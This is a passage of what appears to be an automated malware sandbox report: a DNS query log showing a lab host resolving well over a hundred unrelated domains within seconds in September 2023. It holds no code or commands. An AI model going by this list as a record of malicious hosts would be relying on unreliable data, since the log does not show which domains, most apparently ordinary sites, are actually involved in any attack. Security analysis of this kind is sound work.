                                                                                                                                                                              Sep 15, 2023 07:28:29.138966084 CEST8.8.8.8192.168.2.30xb08bName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.361968040 CEST8.8.8.8192.168.2.30x27e7No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.652386904 CEST8.8.8.8192.168.2.30x42aaNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.671052933 CEST8.8.8.8192.168.2.30xa6e9Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.693847895 CEST8.8.8.8192.168.2.30x24f2No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.795655012 CEST8.8.8.8192.168.2.30x3396Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.110452890 CEST8.8.8.8192.168.2.30xe0aName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.298755884 CEST8.8.8.8192.168.2.30x77edName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.387463093 CEST8.8.8.8192.168.2.30xb278No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.441653013 CEST8.8.8.8192.168.2.30xd5ffNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.873653889 CEST8.8.8.8192.168.2.30xe1c1No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.873653889 CEST8.8.8.8192.168.2.30xe1c1No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.873653889 CEST8.8.8.8192.168.2.30xe1c1No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.873653889 CEST8.8.8.8192.168.2.30xe1c1No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.891005993 CEST8.8.8.8192.168.2.30x713bNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.938726902 CEST8.8.8.8192.168.2.30xfbb5No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.938726902 CEST8.8.8.8192.168.2.30xfbb5No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.938726902 CEST8.8.8.8192.168.2.30xfbb5No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.938726902 CEST8.8.8.8192.168.2.30xfbb5No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.087089062 CEST8.8.8.8192.168.2.30xc2b8No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.169677019 CEST8.8.8.8192.168.2.30xf32aNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.175179958 CEST8.8.8.8192.168.2.30xe360No error (0)shesfit.com172.67.158.251A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.175179958 CEST8.8.8.8192.168.2.30xe360No error (0)shesfit.com104.21.74.141A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.258213997 CEST8.8.8.8192.168.2.30xc4b0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.356170893 CEST8.8.8.8192.168.2.30xc067No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.356170893 CEST8.8.8.8192.168.2.30xc067No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.364569902 CEST8.8.8.8192.168.2.30xc9daNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.364569902 CEST8.8.8.8192.168.2.30xc9daNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.364569902 CEST8.8.8.8192.168.2.30xc9daNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.364569902 CEST8.8.8.8192.168.2.30xc9daNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.374026060 CEST8.8.8.8192.168.2.30xe71eNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.612955093 CEST8.8.8.8192.168.2.30x2318Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.622915983 CEST8.8.8.8192.168.2.30x1fafName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.815897942 CEST8.8.8.8192.168.2.30x5cdbNo error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.898530006 CEST8.8.8.8192.168.2.30x259aNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.934848070 CEST8.8.8.8192.168.2.30x9d57No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.938626051 CEST8.8.8.8192.168.2.30xa605No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.011699915 CEST8.8.8.8192.168.2.30x687aNo error (0)www.fnsds.orgexpired.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.011699915 CEST8.8.8.8192.168.2.30x687aNo error (0)expired.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.011699915 CEST8.8.8.8192.168.2.30x687aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.211.34.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.011699915 CEST8.8.8.8192.168.2.30x687aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.235.172.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.143892050 CEST8.8.8.8192.168.2.30xff3No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.165863991 CEST8.8.8.8192.168.2.30x1ad6No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.220227957 CEST8.8.8.8192.168.2.30x56dfName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.256429911 CEST8.8.8.8192.168.2.30x45bNo error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.257766962 CEST8.8.8.8192.168.2.30x6187Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.259196997 CEST8.8.8.8192.168.2.30x73b5No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.318342924 CEST8.8.8.8192.168.2.30xd994No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.428455114 CEST8.8.8.8192.168.2.30x2c97Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.559559107 CEST8.8.8.8192.168.2.30x1087No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.620449066 CEST8.8.8.8192.168.2.30x9c8No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.620449066 CEST8.8.8.8192.168.2.30x9c8No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.620449066 CEST8.8.8.8192.168.2.30x9c8No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.697756052 CEST8.8.8.8192.168.2.30xec21Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.729109049 CEST8.8.8.8192.168.2.30xf371Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.830454111 CEST8.8.8.8192.168.2.30xa44aName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.831739902 CEST8.8.8.8192.168.2.30xd71cNo error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.171473026 CEST8.8.8.8192.168.2.30x1c1eNo error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.172563076 CEST8.8.8.8192.168.2.30x80dbNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.177680016 CEST8.8.8.8192.168.2.30xf823No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.391634941 CEST8.8.8.8192.168.2.30x6163No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.399806023 CEST8.8.8.8192.168.2.30xda33No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.745553970 CEST8.8.8.8192.168.2.30x42aaServer failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.824598074 CEST8.8.8.8192.168.2.30x9420No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.824598074 CEST8.8.8.8192.168.2.30x9420No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.824598074 CEST8.8.8.8192.168.2.30x9420No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.824598074 CEST8.8.8.8192.168.2.30x9420No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.960771084 CEST8.8.8.8192.168.2.30xec21Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.979592085 CEST8.8.8.8192.168.2.30x34deNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.981353998 CEST8.8.8.8192.168.2.30x3edaNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.981353998 CEST8.8.8.8192.168.2.30x3edaNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.981353998 CEST8.8.8.8192.168.2.30x3edaNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.981353998 CEST8.8.8.8192.168.2.30x3edaNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.997721910 CEST8.8.8.8192.168.2.30x6e75No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.080868959 CEST8.8.8.8192.168.2.30x78b4No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.080868959 CEST8.8.8.8192.168.2.30x78b4No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.080868959 CEST8.8.8.8192.168.2.30x78b4No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.080868959 CEST8.8.8.8192.168.2.30x78b4No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.186520100 CEST8.8.8.8192.168.2.30x591eNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.279031038 CEST8.8.8.8192.168.2.30xe5f2No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.494932890 CEST8.8.8.8192.168.2.30x2ef5No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.574459076 CEST8.8.8.8192.168.2.30xbabdNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.575669050 CEST8.8.8.8192.168.2.30xb654No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.575669050 CEST8.8.8.8192.168.2.30xb654No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.135166883 CEST8.8.8.8192.168.2.30xec21Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.473397970 CEST8.8.8.8192.168.2.30x4614No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.526335955 CEST8.8.8.8192.168.2.30x63b9No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.526335955 CEST8.8.8.8192.168.2.30x63b9No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.526335955 CEST8.8.8.8192.168.2.30x63b9No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.959845066 CEST8.8.8.8192.168.2.30x44a9No error (0)www.rs-ag.com172.67.152.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.959845066 CEST8.8.8.8192.168.2.30x44a9No error (0)www.rs-ag.com104.21.1.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.044167995 CEST8.8.8.8192.168.2.30xd05aNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.091248989 CEST8.8.8.8192.168.2.30x822dNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.471945047 CEST8.8.8.8192.168.2.30xbbe8No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.538204908 CEST8.8.8.8192.168.2.30x404eNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.647831917 CEST8.8.8.8192.168.2.30x8e6No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.148238897 CEST8.8.8.8192.168.2.30xec21Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.163850069 CEST8.8.8.8192.168.2.30x404eNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.217806101 CEST8.8.8.8192.168.2.30xf4eeNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.220745087 CEST8.8.8.8192.168.2.30xdf20No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.220745087 CEST8.8.8.8192.168.2.30xdf20No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.430619955 CEST8.8.8.8192.168.2.30xfef2Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.560508966 CEST8.8.8.8192.168.2.30xb465No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.561415911 CEST8.8.8.8192.168.2.30x1468No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.561415911 CEST8.8.8.8192.168.2.30x1468No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.561738014 CEST8.8.8.8192.168.2.30xc13No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.622421980 CEST8.8.8.8192.168.2.30x7cf0No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.623073101 CEST8.8.8.8192.168.2.30x591bNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.623073101 CEST8.8.8.8192.168.2.30x591bNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.623073101 CEST8.8.8.8192.168.2.30x591bNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.623073101 CEST8.8.8.8192.168.2.30x591bNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.623727083 CEST8.8.8.8192.168.2.30xdff7No error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.624097109 CEST8.8.8.8192.168.2.30x3c13No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.624113083 CEST8.8.8.8192.168.2.30x2901No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.624113083 CEST8.8.8.8192.168.2.30x2901No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.628578901 CEST8.8.8.8192.168.2.30xf171No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.704628944 CEST8.8.8.8192.168.2.30x2804No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.704628944 CEST8.8.8.8192.168.2.30x2804No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.746871948 CEST8.8.8.8192.168.2.30x9a2No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.746871948 CEST8.8.8.8192.168.2.30x9a2No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.750417948 CEST8.8.8.8192.168.2.30x82f2Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.765646935 CEST8.8.8.8192.168.2.30x3b8dNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.765646935 CEST8.8.8.8192.168.2.30x3b8dNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.765646935 CEST8.8.8.8192.168.2.30x3b8dNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.766335964 CEST8.8.8.8192.168.2.30xa867Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.774256945 CEST8.8.8.8192.168.2.30xbeb9No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.774256945 CEST8.8.8.8192.168.2.30xbeb9No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.806242943 CEST8.8.8.8192.168.2.30xcb81No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.806242943 CEST8.8.8.8192.168.2.30xcb81No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.806242943 CEST8.8.8.8192.168.2.30xcb81No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.819722891 CEST8.8.8.8192.168.2.30x7bf2No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.819722891 CEST8.8.8.8192.168.2.30x7bf2No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.875332117 CEST8.8.8.8192.168.2.30x23c8No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.878669977 CEST8.8.8.8192.168.2.30x811dNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.904234886 CEST8.8.8.8192.168.2.30xe8abName error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.910219908 CEST8.8.8.8192.168.2.30xc379No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.910219908 CEST8.8.8.8192.168.2.30xc379No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.936532974 CEST8.8.8.8192.168.2.30xb51eNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.957376957 CEST8.8.8.8192.168.2.30xa38fNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.957376957 CEST8.8.8.8192.168.2.30xa38fNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.981014013 CEST8.8.8.8192.168.2.30xa557No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.231307030 CEST8.8.8.8192.168.2.30x260cNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.231307030 CEST8.8.8.8192.168.2.30x260cNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.231307030 CEST8.8.8.8192.168.2.30x260cNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.337044001 CEST8.8.8.8192.168.2.30xe588No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.340348959 CEST8.8.8.8192.168.2.30x9aafNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.647731066 CEST8.8.8.8192.168.2.30xab19No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.716068983 CEST8.8.8.8192.168.2.30xfef2Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.717083931 CEST8.8.8.8192.168.2.30x7f63No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.717083931 CEST8.8.8.8192.168.2.30x7f63No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.717083931 CEST8.8.8.8192.168.2.30x7f63No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.717083931 CEST8.8.8.8192.168.2.30x7f63No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.785458088 CEST8.8.8.8192.168.2.30x6fd6No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.903436899 CEST8.8.8.8192.168.2.30x9636No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.165287971 CEST8.8.8.8192.168.2.30x4614Server failure (2)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.265950918 CEST8.8.8.8192.168.2.30x604cNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.343945980 CEST8.8.8.8192.168.2.30x80e3No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.490046978 CEST8.8.8.8192.168.2.30xd567Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.491328001 CEST8.8.8.8192.168.2.30x3ac2No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.589024067 CEST8.8.8.8192.168.2.30x9ec3Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.641535997 CEST8.8.8.8192.168.2.30x2639No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.688064098 CEST8.8.8.8192.168.2.30x30a6Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.94.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.80.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.102.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.108.176A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.84.219A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.94.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.80.195A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.738025904 CEST8.8.8.8192.168.2.30xc992No error (0)assideum.com52.219.93.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.810504913 CEST8.8.8.8192.168.2.30x2ed1No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
